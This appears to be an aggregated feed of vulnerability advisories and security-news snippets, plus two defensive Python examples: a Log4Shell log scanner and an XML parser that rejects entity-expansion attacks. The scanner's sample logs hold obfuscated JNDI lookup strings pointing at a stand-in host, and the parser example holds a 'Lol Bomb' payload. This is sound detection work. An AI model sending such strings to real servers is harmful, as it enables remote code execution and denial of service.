The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that multiple nation-state actors are exploiting security flaws in Fortinet FortiOS SSL-VPN and Zoho ManageEngine ServiceDesk Plus to gain unauthorized access and establish persistence on compromised systems. “Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized
Progress Chef Infra Server before 15.7 allows a local attacker to exploit a /var/opt/opscode/local-mode-cache/backup world-readable temporary backup path to access sensitive information, resulting in the disclosure of all indexed node data, because OpenSearch credentials are exposed. (The data typically includes credentials for additional systems.) The attacker must wait for an admin to run the "chef-server-ctl reconfigure" command.
Categories: Exploits and vulnerabilities Categories: News Tags: Oracle Tags: WebLogic Tags: CVE-2023-21839 Tags: CVE-2023-1389 Tags: CVE-2021-45046 Tags: CISA Tags: reverse shell An easy to exploit vulnerability in Oracle WebLogic Server has been added to the CISA list of things you really, really need to patch. (Read more...) The post Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited” appeared first on Malwarebytes Labs.
Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07.
In Docker Desktop 4.17.x the Artifactory Integration falls back to sending registry credentials over plain HTTP if the HTTPS health check has failed. A targeted network sniffing attack can lead to a disclosure of sensitive information. Only users who have Access Experimental Features enabled and have logged in to a private registry are affected.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
ThingsBoard 3.4.1 could allow a remote attacker to gain elevated privileges because hard-coded service credentials (usable for privilege escalation) are stored in an insecure format. (To read this stored data, the attacker needs access to the application server or its source code.)
SQL Injection vulnerability in Talend ESB Runtime 7.3.1-R2022-09-RT thru 8.0.1-R2022-10-RT when using the provisioning service.
An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.
Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
The subgroup of an Iranian nation-state group known as Nemesis Kitten has been attributed as behind a previously undocumented custom malware dubbed Drokbk that uses GitHub as a dead drop resolver to exfiltrate data from an infected computer, or to receive commands. "The use of GitHub as a virtual dead drop helps the malware blend in," Secureworks principal researcher Rafe Pilling said. "All the
Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.
Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it.
A lack of MFA remains one of the biggest impediments to enterprise security.
The good news: The Apache Commons Text library bug is far less likely to lead to exploitation than last year's Log4j library flaw.
Categories: Exploits and vulnerabilities Categories: News Tags: Chinese APT Tags: advanced persistent threat Tags: APT Tags: CISA Tags: NSA Tags: FBI Tags: security advisory CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsorted threat actors from China. (Read more...) The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020. The agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked
Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.
Trustwave report also finds 2022 is set to surpass 2021 for volume of critical CVEs
Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.
Commodity malware usage surpasses ransomware by narrow margin By Caitlin Huey. For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments. Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan ...
Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.
Dell PowerStore, versions prior to 3.0.0.0, contains an OS Command Injection vulnerability in PowerStore T environment. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS command on the PowerStore underlying OS. Exploiting may lead to a system take over by an attacker.
Vulnerability will remain a "significant" threat for years to come and highlighted the need for more public and private sector support for open source software ecosystem, Cyber Safety Review Board says.
What are container image vulnerabilities?
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. "Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched,
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
An infinite loop in OPC UA .NET Standard Stack 1.04.368 allows remote attackers to cause the application to hang via a crafted message.
A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.
Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x contain an open port vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure and arbitrary code execution.
Couchbase Server before 7.1.0 has Incorrect Access Control.
EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.
Calibre-Web before 0.6.18 allows user table SQL Injection.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow an unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
VMware Workspace ONE Access 21.08, 20.10.0.1, and 20.10 contain an authentication bypass vulnerability. A malicious actor, who has successfully provided first-factor authentication, may be able to obtain second-factor authentication provided by VMware Verify.
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
Published on: 2021 Dec 11, updated 2022 Apr 6. SUMMARY Microsoft continues our analysis of the remote code execution vulnerabilities related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. Currently, Microsoft is not aware of any impact, outside of the initial disclosure involving Minecraft: Java Edition, to the security of our enterprise services and has not experienced any degradation in availability of those services as a result of this vulnerability.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
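Detection logic for the lookup patterns described in this entry and in the CVE-2021-45046 entry above, as an added example rather than code from the Log4j project or from any vendor: it normalizes a log line by percent-decoding it and collapsing the obfuscating lookups seen in real traffic (`${lower:…}`, `${upper:…}` and the default-value `:-` syntax, including the bare `${::-j}` form) from the inside out, then looks for a surviving `${jndi:` lookup. The access-log lines are constructed for the example, the 198.51.100.7 address is a documentation address, and the 20-round bound on nesting is an assumed limit.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no '$', '{' or '}' inside, so nesting resolves inner-first.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the disguise is stripped.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _deobfuscate(expr):
    """Emulate the Log4j 2 lookups attackers nest to hide the string 'jndi'.

    Returns the substituted text, or None to leave the lookup untouched.
    """
    name, _, rest = expr.partition(":")
    key = name.strip().lower()
    if key == "jndi":                 # the payload itself: keep it visible
        return None
    if key == "lower":                # ${lower:J} -> j
        return rest.lower()
    if key == "upper":                # ${upper:n} -> N
        return rest.upper()
    if ":-" in expr:                  # default-value syntax: ${env:NOPE:-j} or ${::-j} -> j
        return expr.split(":-", 1)[1]
    return None                       # ${date:...}, ${ctx:...}, ...: leave as-is


def _substitute(match):
    replacement = _deobfuscate(match.group(1))
    return match.group(0) if replacement is None else replacement


def normalize(text, max_rounds=20):
    """Percent-decode, then collapse obfuscating lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):       # bounded: pathological nesting cannot spin forever
        new = INNER_LOOKUP.sub(_substitute, text)
        if new == text:
            return text
        text = new
    return text


def find_jndi(line):
    """Return the normalized line if it carries a JNDI lookup, else None."""
    norm = normalize(line)
    return norm if JNDI.search(norm) else None


def scan(lines):
    """Indices of the lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if find_jndi(line) is not None]


# Constructed sample access-log lines (not real traffic); 198.51.100.7 is a documentation address.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${lower:LDAP}://198.51.100.7/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${::-l}dap://198.51.100.7/c}"',
    '10.0.0.8 - - "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0 ${date:yyyy}"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"line {i}: {find_jndi(SAMPLE_LOGS[i])}")
```

The first four sample lines are flagged and the last one, which carries only a `${date:yyyy}` lookup, is not. In a stricter policy any `${…}` lookup that survives normalization in an untrusted field (User-Agent, query string, MDC values) deserves an alert, since the CVE-2021-45046 entry above shows that non-JNDI lookups such as `${ctx:…}` can still pull attacker data into the pattern.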
Insufficient Input Validation in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 allows an authenticated remote attacker with Object Modification privileges to insert arbitrary HTML without code execution.
Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.
An issue was discovered in Wind River VxWorks 7. The memory allocator has a possible integer overflow in calculating a memory block's size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Solr versions 1.3.0 to 1.4.1, 3.1.0 to 3.6.2 and 4.0.0 to 4.10.4 are vulnerable to an XML resource consumption attack (a.k.a. Lol Bomb) via its update handler. By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that will expand when the server parses the XML, causing OOMs.
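Refusing the DTD before anything is expanded is the usual mitigation for the entity-expansion attack described above. The following is an added example, not Solr's own update handler or any code from the Solr project: it uses Python's standard-library expat bindings to reject every DOCTYPE or ENTITY declaration in an untrusted update body and, as a second line of defence, caps the amount of character data it will accept. The Solr-style `<add>` document, the entity bomb and the 1 MiB text budget are constructed for the example.

```python
import xml.parsers.expat

MAX_TEXT_CHARS = 1 << 20   # budget for expanded character data; assumed for this example


class UnsafeXML(ValueError):
    """Untrusted document declares a DTD/entities or exceeds the text budget."""


def parse_untrusted_xml(data):
    """Parse an XML update body while refusing every DOCTYPE or ENTITY declaration.

    Entity expansion is what a Lol Bomb relies on; with no DTD allowed there is
    nothing to expand. Returns a small summary of what was parsed.
    """
    summary = {"elements": 0, "chars": 0}
    p = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before any entity in the internal subset is declared.
        raise UnsafeXML(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"ENTITY {name!r} declaration is not allowed")

    def on_start(name, attrs):
        summary["elements"] += 1

    def on_text(text):
        summary["chars"] += len(text)
        if summary["chars"] > MAX_TEXT_CHARS:   # cap expanded text even without a DTD
            raise UnsafeXML("character data exceeds budget")

    p.StartDoctypeDeclHandler = reject_doctype
    p.EntityDeclHandler = reject_entity
    p.StartElementHandler = on_start
    p.CharacterDataHandler = on_text
    p.Parse(data, True)   # an exception raised inside a handler propagates out of Parse()
    return summary


def is_safe(data):
    """True if the document parses under the rules above, False if it was rejected."""
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXML:
        return False


# Constructed inputs: a benign Solr-style update and a classic entity bomb.
SOLR_ADD = b'<add><doc><field name="id">1</field><field name="title">hello</field></doc></add>'
LOL_BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<add><doc><field name="id">&lol3;</field></doc></add>"""

if __name__ == "__main__":
    print(parse_untrusted_xml(SOLR_ADD))
    print("bomb accepted:", is_safe(LOL_BOMB))
```

The benign document yields four elements and six characters of field text; the bomb is rejected at the `<!DOCTYPE` token, so none of its entities are ever declared, let alone expanded. The character budget matters on its own because a large, DTD-free document can still exhaust memory if the handler buffers everything it reads.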
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).